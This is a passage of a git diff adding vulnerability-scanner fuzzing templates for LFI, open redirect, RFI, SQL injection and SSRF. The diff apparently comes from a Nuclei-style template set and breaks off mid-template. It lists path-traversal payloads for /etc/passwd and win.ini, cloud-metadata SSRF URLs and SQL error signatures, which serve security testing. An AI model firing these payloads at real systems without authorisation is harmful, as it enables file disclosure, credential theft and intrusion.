"^(./|../|/)|(.html|.htm|.xml|.conf|.cfg|.log|.txt|.pdf|.doc|.docx|.xls|.csv|.png|.jpg|.gif)$" + fuzz: + - "{{pathtraversal}}" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: regex + part: body + regex: + - 'root:.*?:[0-9]*:[0-9]*:' + + - type: word + part: body + words: + - 'for 16-bit app support' + + - type: regex + part: body + regex: + - '()' + + - type: regex + part: body + regex: + - '()' diff --git a/http/fuzzing/dast/lfi/linux-lfi-fuzz.yaml b/http/fuzzing/dast/lfi/linux-lfi-fuzz.yaml new file mode 100644 index 0000000000..7d66c21d9e --- /dev/null +++ b/http/fuzzing/dast/lfi/linux-lfi-fuzz.yaml @@ -0,0 +1,78 @@ +id: linux-lfi-fuzz + +info: + name: Local File Inclusion - Linux + author: DhiyaneshDK + severity: high + reference: + - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/Intruder/directory_traversal.txt + - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion + tags: lfi,dast,linux,fuzz + +http: + - method: GET + path: + - '{{BaseURL}}' + + payloads: + nix_fuzz: + - '/etc/passwd' + - '../../etc/passwd' + - '../../../etc/passwd' + - '/../../../../etc/passwd' + - '../../../../../../../../../etc/passwd' + - '../../../../../../../../etc/passwd' + - '../../../../../../../etc/passwd' + - '../../../../../../etc/passwd' + - '../../../../../etc/passwd' + - '../../../../etc/passwd' + - '../../../etc/passwd' + - '../../../etc/passwd%00' + - '../../../../../../../../../../../../etc/passwd%00' + - '../../../../../../../../../../../../etc/passwd' + - '/../../../../../../../../../../etc/passwd^^' + - '/../../../../../../../../../../etc/passwd' + - '/./././././././././././etc/passwd' + - '\..\..\..\..\..\..\..\..\..\..\etc\passwd' + - '..\..\..\..\..\..\..\..\..\..\etc\passwd' + - '/..\../..\../..\../..\../..\../..\../etc/passwd' + - '.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd' + - '\..\..\..\..\..\..\..\..\..\..\etc\passwd%00' + - '..\..\..\..\..\..\..\..\..\..\etc\passwd%00' + - '%252e%252e%252fetc%252fpasswd' + - '%252e%252e%252fetc%252fpasswd%00' + - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd' + - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00' + - '....//....//etc/passwd' + - '..///////..////..//////etc/passwd' + - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd' + - '%0a/bin/cat%20/etc/passwd' + - '%00/etc/passwd%00' + - '%00../../../../../../etc/passwd' + - '/../../../../../../../../../../../etc/passwd%00.jpg' + - '/../../../../../../../../../../../etc/passwd%00.html' + - '/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd' + - '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + - '\\'/bin/cat%20/etc/passwd\\'' + - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd' + - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd' + - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd' + - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd' + + fuzzing: + - part: query + type: replace # replaces existing parameter value with fuzz payload + mode: multiple # replaces all parameters value with fuzz payload + fuzz: + - '{{nix_fuzz}}' + + stop-at-first-match: true + matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' diff --git a/http/fuzzing/dast/lfi/windows-lfi-fuzz.yaml b/http/fuzzing/dast/lfi/windows-lfi-fuzz.yaml new file mode 100644 index 0000000000..cf5fd0a082 --- /dev/null +++ b/http/fuzzing/dast/lfi/windows-lfi-fuzz.yaml @@ -0,0 +1,71 @@ +id: windows-lfi-fuzz + +info: + name: Local File Inclusion - Windows + author: pussycat0x + severity: high + tags: lfi,windows,dast,fuzz + +http: + - method: GET + path: + - '{{BaseURL}}' + + payloads: + win_fuzz: + - '\WINDOWS\win.ini' + - '\WINDOWS\win.ini' + - '\WINDOWS\win.ini%00' + - '\WINNT\win.ini' + - '\WINNT\win.ini%00' + - 'windows/win.ini%00' + - '../../windows/win.ini' + - '....//....//windows/win.ini' + - '/../../../../../../../../../../../../../../../../&location=Windows/win.ini' + - '../../../../../windows/win.ini' + - '/..///////..////..//////windows/win.ini' + - '/../../../../../../../../../windows/win.ini' + - './../../../../../../../../../../windows/win.ini' + - '/...\...\...\...\...\...\...\...\...\windows\win.ini' + - '/.../.../.../.../.../.../.../.../.../windows/win.ini' + - '/..../..../..../..../..../..../..../..../..../windows/win.ini' + - '/....\....\....\....\....\....\....\....\....\windows\win.ini' + - '\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini' + - '/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini' + - '..%2f..%2f..%2f..%2fwindows/win.ini' + - '..%2f..%2f..%2f..%2f..%2fwindows/win.ini' + - '..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini' + - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini' + - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00' + - '..%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini' + - '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini' + - '/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini' + - '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini' + - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini' + - '/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini' + - '/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' + - '%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini' + - '%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' + - '/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini' + - '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini' + - '..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini' + - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini' + - '%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini' + - '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini' + + fuzzing: + - part: query + type: replace # replaces existing parameter value with fuzz payload + mode: multiple # replaces all parameters value with fuzz payload + fuzz: + - '{{win_fuzz}}' + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and diff --git a/http/fuzzing/dast/redirect/open-redirect.yaml b/http/fuzzing/dast/redirect/open-redirect.yaml new file mode 100644 index 0000000000..10dcb4a9b2 --- /dev/null +++ b/http/fuzzing/dast/redirect/open-redirect.yaml @@ -0,0 +1,180 @@ +id: open-redirect + +info: + name: Open Redirect Detection + author: princechaddha + severity: medium + tags: redirect,dast,fuzz + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + redirect: + - "evil.com" + + fuzzing: + - part: query + mode: single + keys: + - AuthState + - URL + - _url + - callback + - checkout + - checkout_url + - content + - continue + - continueTo + - counturl + - data + - dest + - dest_url + - destination + - dir + - document + - domain + - done + - download + - feed + - file + - file_name + - file_url + - folder + - folder_url + - forward + - from_url + - go + - goto + - host + - html + - http + - https + - image + - image_src + - image_url + - imageurl + - img + - img_url + - include + - langTo + - load_file + - load_url + - login_to + - login_url + - logout + - media + - navigation + - next + - next_page + - open + - out + - page + - page_url + - pageurl + - path + - picture + - port + - proxy + - r + - r2 + - redir + - redirect + - redirectUri + - redirectUrl + - redirect_to + - redirect_uri + - redirect_url + - reference + - referrer + - req + - request + - ret + - retUrl + - return + - returnTo + - return_path + - return_to + - return_url + - rt + - rurl + - show + - site + - source + - src + - target + - to + - u + - uri + - url + - val + - validate + - view + - window + - back + - cgi + - follow + - home + - jump + - link + - location + - menu + - move + - nav + - orig_url + - out_url + - query + - auth + - callback_url + - confirm_url + - destination_url + - domain_url + - entry + - exit + - forward_url + - go_to + - goto_url + - home_url + - image_link + - load + - logout_url + - nav_to + - origin + - page_link + - redirect_link + - ref + - referrer_url + - return_link + - return_to_url + - source_url + - target_url + - to_url + - validate_url + - DirectTo + - relay + + fuzz: + - "https://{{redirect}}" + + - part: query + mode: single + values: + - "https?://" # Replace HTTP URLs with alternatives + fuzz: + - "https://{{redirect}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + + - type: status + status: + - 301 + - 302 + - 307 diff --git a/http/fuzzing/dast/rfi/rfi.yaml b/http/fuzzing/dast/rfi/rfi.yaml new file mode 100644 index 0000000000..0fedee21ae --- /dev/null +++ b/http/fuzzing/dast/rfi/rfi.yaml @@ -0,0 +1,31 @@ +id: rfi + +info: + name: Remote File Inclusion + author: m4lwhere + severity: high + reference: + - https://www.invicti.com/learn/remote-file-inclusion-rfi/ + tags: rfi,dast,oast,fuzz + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + rfi: + - "https://rfi.nessus.org/rfi.txt" + + fuzzing: + - part: query + mode: single + fuzz: + - "{{rfi}}" + + stop-at-first-match: true + matchers: + - type: word + part: body # Confirms the PHP was executed + words: + - "NessusCodeExecTest" diff --git a/http/fuzzing/dast/sqli/cves/CVE-2022-34265.yaml b/http/fuzzing/dast/sqli/cves/CVE-2022-34265.yaml new file mode 100644 index 0000000000..de035db7ce --- /dev/null +++ b/http/fuzzing/dast/sqli/cves/CVE-2022-34265.yaml @@ -0,0 +1,45 @@ +id: CVE-2022-34265 + +info: + name: Django - SQL injection + author: princechaddha + severity: critical + description: | + An issue was discovered in Django 3.2 before 3.2.14 and 4.0 before 4.0.6. The Trunc() and Extract() database functions are subject to SQL injection if untrusted data is used as a kind/lookup_name value. Applications that constrain the lookup name and kind choice to a known safe list are unaffected. + reference: + - https://github.com/vulhub/vulhub/tree/master/django/CVE-2022-34265 + - https://nvd.nist.gov/vuln/detail/CVE-2022-34265 + - https://www.djangoproject.com/weblog/2022/jul/04/security-releases/ + - https://docs.djangoproject.com/en/4.0/releases/security/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-34265 + cwe-id: CWE-89 + tags: sqli,dast,vulhub,cve,cve2022,django,fuzz + +variables: + rand_string: '{{rand_text_alpha(15, "abc")}}' + +http: + - method: GET + path: + - "{{BaseURL}}" + + fuzzing: + - part: query + fuzz: + - "test'{{rand_string}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'syntax error at or near "{{rand_string}}"' + - 'LINE 1: SELECT DATE_TRUNC' + condition: and + + - type: status + status: + - 500 diff --git a/http/fuzzing/dast/sqli/error-based.yaml b/http/fuzzing/dast/sqli/error-based.yaml new file mode 100644 index 0000000000..2545ba8684 --- /dev/null +++ b/http/fuzzing/dast/sqli/error-based.yaml @@ -0,0 +1,492 @@ +id: sqli-error-based + +info: + name: Error based SQL Injection + author: geeknik,pdteam + severity: critical + description: | + Direct SQL Command Injection is a technique where an attacker creates or alters existing SQL commands to expose hidden data, + or to override valuable ones, or even to execute dangerous system level commands on the database host. + This is accomplished by the application taking user input and combining it with static parameters to build an SQL query . + tags: sqli,error,dast,fuzz + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + injection: + - "'" + - "\"" + - ";" + + fuzzing: + - part: query + type: postfix + fuzz: + - "{{injection}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Adminer" + negative: true + # False Positive + + - type: regex + regex: + # MySQL + - "SQL syntax.*?MySQL" + - "Warning.*?\\Wmysqli?_" + - "MySQLSyntaxErrorException" + - "valid MySQL result" + - "check the manual that (corresponds to|fits) your MySQL server version" + - "Unknown column '[^ ]+' in 'field list'" + - "MySqlClient\\." + - "com\\.mysql\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" + - "Pdo[./_\\\\]Mysql" + - "MySqlException" + - "SQLSTATE\\[\\d+\\]: Syntax error or access violation" + # MariaDB + - "check the manual that (corresponds to|fits) your MariaDB server version" + # Drizzle + - "check the manual that (corresponds to|fits) your Drizzle server version" + # MemSQL + - "MemSQL does not support this type of query" + - "is not supported by MemSQL" + - "unsupported nested scalar subselect" + # PostgreSQL + - "PostgreSQL.*?ERROR" + - "Warning.*?\\Wpg_" + - "valid PostgreSQL result" + - "Npgsql\\." + - "PG::SyntaxError:" + - "org\\.postgresql\\.util\\.PSQLException" + - "ERROR:\\s\\ssyntax error at or near" + - "ERROR: parser: parse error at or near" + - "PostgreSQL query failed" + - "org\\.postgresql\\.jdbc" + - "Pdo[./_\\\\]Pgsql" + - "PSQLException" + # Microsoft SQL Server + - "Driver.*? SQL[\\-\\_\\ ]*Server" + - "OLE DB.*? SQL Server" + - "\\bSQL Server[^<"]+Driver" + - "Warning.*?\\W(mssql|sqlsrv)_" + - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" + - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" + - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." + - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" + - "\\[SQL Server\\]" + - "ODBC SQL Server Driver" + - "ODBC Driver \\d+ for SQL Server" + - "SQLServer JDBC Driver" + - "com\\.jnetdirect\\.jsql" + - "macromedia\\.jdbc\\.sqlserver" + - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" + - "com\\.microsoft\\.sqlserver\\.jdbc" + - "Pdo[./_\\\\](Mssql|SqlSrv)" + - "SQL(Srv|Server)Exception" + - "Unclosed quotation mark after the character string" + # Microsoft Access + - "Microsoft Access (\\d+ )?Driver" + - "JET Database Engine" + - "Access Database Engine" + - "ODBC Microsoft Access" + - "Syntax error \\(missing operator\\) in query expression" + # Oracle + - "\\bORA-\\d{5}" + - "Oracle error" + - "Oracle.*?Driver" + - "Warning.*?\\W(oci|ora)_" + - "quoted string not properly terminated" + - "SQL command not properly ended" + - "macromedia\\.jdbc\\.oracle" + - "oracle\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Oracle_Exception" + - "Pdo[./_\\\\](Oracle|OCI)" + - "OracleException" + # IBM DB2 + - "CLI Driver.*?DB2" + - "DB2 SQL error" + - "\\bdb2_\\w+\\(" + - "SQLCODE[=:\\d, -]+SQLSTATE" + - "com\\.ibm\\.db2\\.jcc" + - "Zend_Db_(Adapter|Statement)_Db2_Exception" + - "Pdo[./_\\\\]Ibm" + - "DB2Exception" + - "ibm_db_dbi\\.ProgrammingError" + # Informix + - "Warning.*?\\Wifx_" + - "Exception.*?Informix" + - "Informix ODBC Driver" + - "ODBC Informix driver" + - "com\\.informix\\.jdbc" + - "weblogic\\.jdbc\\.informix" + - "Pdo[./_\\\\]Informix" + - "IfxException" + # Firebird + - "Dynamic SQL Error" + - "Warning.*?\\Wibase_" + - "org\\.firebirdsql\\.jdbc" + - "Pdo[./_\\\\]Firebird" + # SQLite + - "SQLite/JDBCDriver" + - "SQLite\\.Exception" + - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" + - "Warning.*?\\W(sqlite_|SQLite3::)" + - "\\[SQLITE_ERROR\\]" + - "SQLite error \\d+:" + - "sqlite3.OperationalError:" + - "SQLite3::SQLException" + - "org\\.sqlite\\.JDBC" + - "Pdo[./_\\\\]Sqlite" + - "SQLiteException" + # SAP MaxDB + - "SQL error.*?POS([0-9]+)" + - "Warning.*?\\Wmaxdb_" + - "DriverSapDB" + - "-3014.*?Invalid end of SQL statement" + - "com\\.sap\\.dbtech\\.jdbc" + - "\\[-3008\\].*?: Invalid keyword or missing delimiter" + # Sybase + - "Warning.*?\\Wsybase_" + - "Sybase message" + - "Sybase.*?Server message" + - "SybSQLException" + - "Sybase\\.Data\\.AseClient" + - "com\\.sybase\\.jdbc" + # Ingres + - "Warning.*?\\Wingres_" + - "Ingres SQLSTATE" + - "Ingres\\W.*?Driver" + - "com\\.ingres\\.gcf\\.jdbc" + # FrontBase + - "Exception (condition )?\\d+\\. Transaction rollback" + - "com\\.frontbase\\.jdbc" + - "Syntax error 1. Missing" + - "(Semantic|Syntax) error [1-4]\\d{2}\\." + # HSQLDB + - "Unexpected end of command in statement \\[" + - "Unexpected token.*?in statement \\[" + - "org\\.hsqldb\\.jdbc" + # H2 + - "org\\.h2\\.jdbc" + - "\\[42000-192\\]" + # MonetDB + - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" + - "\\[MonetDB\\]\\[ODBC Driver" + - "nl\\.cwi\\.monetdb\\.jdbc" + # Apache Derby + - "Syntax error: Encountered" + - "org\\.apache\\.derby" + - "ERROR 42X01" + # Vertica + - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" + - "/vertica/Parser/scan" + - "com\\.vertica\\.jdbc" + - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" + - "com\\.vertica\\.dsi\\.dataengine" + # Mckoi + - "com\\.mckoi\\.JDBCDriver" + - "com\\.mckoi\\.database\\.jdbc" + - "<REGEX_LITERAL>" + # Presto + - "com\\.facebook\\.presto\\.jdbc" + - "io\\.prestosql\\.jdbc" + - "com\\.simba\\.presto\\.jdbc" + - "UNION query has different number of fields: \\d+, \\d+" + # Altibase + - "Altibase\\.jdbc\\.driver" + # MimerSQL + - "com\\.mimer\\.jdbc" + - "Syntax error,[^\\n]+assumed to mean" + # CrateDB + - "io\\.crate\\.client\\.jdbc" + # Cache + - "encountered after end of query" + - "A comparison operator is required here" + # Raima Database Manager + - "-10048: Syntax error" + - "rdmStmtPrepare\\(.+?\\) returned" + # Virtuoso + - "SQ074: Line \\d+:" + - "SR185: Undefined procedure" + - "SQ200: No table " + - "Virtuoso S0002 Error" + - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" + condition: or + + extractors: + - type: regex + name: mysql + regex: + - "SQL syntax.*?MySQL" + - "Warning.*?\\Wmysqli?_" + - "MySQLSyntaxErrorException" + - "valid MySQL result" + - "check the manual that (corresponds to|fits) your MySQL server version" + - "Unknown column '[^ ]+' in 'field list'" + - "MySqlClient\\." + - "com\\.mysql\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" + - "Pdo[./_\\\\]Mysql" + - "MySqlException" + - "SQLSTATE[\\d+]: Syntax error or access violation" + + - type: regex + name: mariadb + regex: + - "check the manual that (corresponds to|fits) your MariaDB server version" + + - type: regex + name: drizzel + regex: + - "check the manual that (corresponds to|fits) your Drizzle server version" + + - type: regex + name: memsql + regex: + - "MemSQL does not support this type of query" + - "is not supported by MemSQL" + - "unsupported nested scalar subselect" + + - type: regex + name: postgresql + regex: + - "PostgreSQL.*?ERROR" + - "Warning.*?\\Wpg_" + - "valid PostgreSQL result" + - "Npgsql\\." + - "PG::SyntaxError:" + - "org\\.postgresql\\.util\\.PSQLException" + - "ERROR:\\s\\ssyntax error at or near" + - "ERROR: parser: parse error at or near" + - "PostgreSQL query failed" + - "org\\.postgresql\\.jdbc" + - "Pdo[./_\\\\]Pgsql" + - "PSQLException" + + - type: regex + name: microsoftsqlserver + regex: + - "Driver.*? SQL[\\-\\_\\ ]*Server" + - "OLE DB.*? SQL Server" + - "\\bSQL Server[^<"]+Driver" + - "Warning.*?\\W(mssql|sqlsrv)_" + - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" + - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" + - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." + - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" + - "\\[SQL Server\\]" + - "ODBC SQL Server Driver" + - "ODBC Driver \\d+ for SQL Server" + - "SQLServer JDBC Driver" + - "com\\.jnetdirect\\.jsql" + - "macromedia\\.jdbc\\.sqlserver" + - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" + - "com\\.microsoft\\.sqlserver\\.jdbc" + - "Pdo[./_\\\\](Mssql|SqlSrv)" + - "SQL(Srv|Server)Exception" + - "Unclosed quotation mark after the character string" + + - type: regex + name: microsoftaccess + regex: + - "Microsoft Access (\\d+ )?Driver" + - "JET Database Engine" + - "Access Database Engine" + - "ODBC Microsoft Access" + - "Syntax error \\(missing operator\\) in query expression" + + - type: regex + name: oracle + regex: + - "\\bORA-\\d{5}" + - "Oracle error" + - "Oracle.*?Driver" + - "Warning.*?\\W(oci|ora)_" + - "quoted string not properly terminated" + - "SQL command not properly ended" + - "macromedia\\.jdbc\\.oracle" + - "oracle\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Oracle_Exception" + - "Pdo[./_\\\\](Oracle|OCI)" + - "OracleException" + + - type: regex + name: ibmdb2 + regex: + - "CLI Driver.*?DB2" + - "DB2 SQL error" + - "\\bdb2_\\w+\\(" + - "SQLCODE[=:\\d, -]+SQLSTATE" + - "com\\.ibm\\.db2\\.jcc" + - "Zend_Db_(Adapter|Statement)_Db2_Exception" + - "Pdo[./_\\\\]Ibm" + - "DB2Exception" + - "ibm_db_dbi\\.ProgrammingError" + + - type: regex + name: informix + regex: + - "Warning.*?\\Wifx_" + - "Exception.*?Informix" + - "Informix ODBC Driver" + - "ODBC Informix driver" + - "com\\.informix\\.jdbc" + - "weblogic\\.jdbc\\.informix" + - "Pdo[./_\\\\]Informix" + - "IfxException" + + - type: regex + name: firebird + regex: + - "Dynamic SQL Error" + - "Warning.*?\\Wibase_" + - "org\\.firebirdsql\\.jdbc" + - "Pdo[./_\\\\]Firebird" + + - type: regex + name: sqlite + regex: + - "SQLite/JDBCDriver" + - "SQLite\\.Exception" + - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" + - "Warning.*?\\W(sqlite_|SQLite3::)" + - "\\[SQLITE_ERROR\\]" + - "SQLite error \\d+:" + - "sqlite3.OperationalError:" + - "SQLite3::SQLException" + - "org\\.sqlite\\.JDBC" + - "Pdo[./_\\\\]Sqlite" + - "SQLiteException" + + - type: regex + name: sapmaxdb + regex: + - "SQL error.*?POS([0-9]+)" + - "Warning.*?\\Wmaxdb_" + - "DriverSapDB" + - "-3014.*?Invalid end of SQL statement" + - "com\\.sap\\.dbtech\\.jdbc" + - "\\[-3008\\].*?: Invalid keyword or missing delimiter" + + - type: regex + name: sybase + regex: + - "Warning.*?\\Wsybase_" + - "Sybase message" + - "Sybase.*?Server message" + - "SybSQLException" + - "Sybase\\.Data\\.AseClient" + - "com\\.sybase\\.jdbc" + + - type: regex + name: ingres + regex: + - "Warning.*?\\Wingres_" + - "Ingres SQLSTATE" + - "Ingres\\W.*?Driver" + - "com\\.ingres\\.gcf\\.jdbc" + + - type: regex + name: frontbase + regex: + - "Exception (condition )?\\d+\\. Transaction rollback" + - "com\\.frontbase\\.jdbc" + - "Syntax error 1. Missing" + - "(Semantic|Syntax) error \\[1-4\\]\\d{2}\\." + + - type: regex + name: hsqldb + regex: + - "Unexpected end of command in statement \\[" + - "Unexpected token.*?in statement \\[" + - "org\\.hsqldb\\.jdbc" + + - type: regex + name: h2 + regex: + - "org\\.h2\\.jdbc" + - "\\[42000-192\\]" + + - type: regex + name: monetdb + regex: + - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" + - "\\[MonetDB\\]\\[ODBC Driver" + - "nl\\.cwi\\.monetdb\\.jdbc" + + - type: regex + name: apachederby + regex: + - "Syntax error: Encountered" + - "org\\.apache\\.derby" + - "ERROR 42X01" + + - type: regex + name: vertica + regex: + - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" + - "/vertica/Parser/scan" + - "com\\.vertica\\.jdbc" + - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" + - "com\\.vertica\\.dsi\\.dataengine" + + - type: regex + name: mckoi + regex: + - "com\\.mckoi\\.JDBCDriver" + - "com\\.mckoi\\.database\\.jdbc" + - "<REGEX_LITERAL>" + + - type: regex + name: presto + regex: + - "com\\.facebook\\.presto\\.jdbc" + - "io\\.prestosql\\.jdbc" + - "com\\.simba\\.presto\\.jdbc" + - "UNION query has different number of fields: \\d+, \\d+" + + - type: regex + name: altibase + regex: + - "Altibase\\.jdbc\\.driver" + + - type: regex + name: mimersql + regex: + - "com\\.mimer\\.jdbc" + - "Syntax error,[^\\n]+assumed to mean" + + - type: regex + name: cratedb + regex: + - "io\\.crate\\.client\\.jdbc" + + - type: regex + name: cache + regex: + - "encountered after end of query" + - "A comparison operator is required here" + + - type: regex + name: raimadatabasemanager + regex: + - "-10048: Syntax error" + - "rdmStmtPrepare\\(.+?\\) returned" + + - type: regex + name: virtuoso + regex: + - "SQ074: Line \\d+:" + - "SR185: Undefined procedure" + - "SQ200: No table " + - "Virtuoso S0002 Error" + - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" diff --git a/http/fuzzing/dast/ssrf/blind-ssrf.yaml b/http/fuzzing/dast/ssrf/blind-ssrf.yaml new file mode 100644 index 0000000000..c1214fb959 --- /dev/null +++ b/http/fuzzing/dast/ssrf/blind-ssrf.yaml @@ -0,0 +1,40 @@ +id: blind-ssrf + +info: + name: Blind SSRF OAST Detection + author: pdteam + severity: medium + tags: ssrf,dast,oast,fuzz + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + ssrf: + - "{{interactsh-url}}" + - "{{FQDN}}.{{interactsh-url}}" + - "{{RDN}}.{{interactsh-url}}" + + fuzzing: + - part: query + mode: single + values: + - "https?://" # Replace HTTP URLs with alternatives + fuzz: + - "https://{{ssrf}}" + + - part: query + mode: single + values: + - "^[A-Za-z0-9-._]+:[0-9]+$" # Replace : with alternative + fuzz: + - "{{ssrf}}:80" + + stop-at-first-match: true + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/http/fuzzing/dast/ssrf/response-ssrf.yaml b/http/fuzzing/dast/ssrf/response-ssrf.yaml new file mode 100644 index 0000000000..f10572e049 --- /dev/null +++ b/http/fuzzing/dast/ssrf/response-ssrf.yaml @@ -0,0 +1,127 @@ +id: response-ssrf + +info: + name: Full Response SSRF Detection + author: pdteam,pwnhxl,j4vaovo + severity: high + reference: + - https://github.com/bugcrowd/HUNT/blob/master/ZAP/scripts/passive/SSRF.py + tags: ssrf,dast,fuzz + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + ssrf: + - 'http://{{interactsh-url}}' + - 'http://{{FQDN}}.{{interactsh-url}}' + - 'http://{{RDN}}.{{interactsh-url}}' + - 'file:////./etc/./passwd' + - 'file:///c:/./windows/./win.ini' + - 'http://metadata.tencentyun.com/latest/meta-data/' + - 'http://100.100.100.200/latest/meta-data/' + - 'http://169.254.169.254/latest/meta-data/' + - 'http://169.254.169.254/metadata/v1' + - 'http://127.0.0.1:22' + - 'http://127.0.0.1:3306' + - 'dict://127.0.0.1:6379/info' + + fuzzing: + - part: query + mode: single + keys: + - callback + - continue + - data + - dest + - dir + - domain + - feed + - file + - host + - html + - imgurl + - navigation + - next + - open + - out + - page + - path + - port + - redirect + - reference + - return + - show + - site + - to + - uri + - url + - val + - validate + - view + - window + fuzz: + - "{{ssrf}}" + + - part: query + mode: single + values: + - "(https|http|file)(%3A%2F%2F|://)(.*?)" + fuzz: + - "{{ssrf}}" + + stop-at-first-match: true + matchers-condition: or + matchers: + + - type: word + part: body 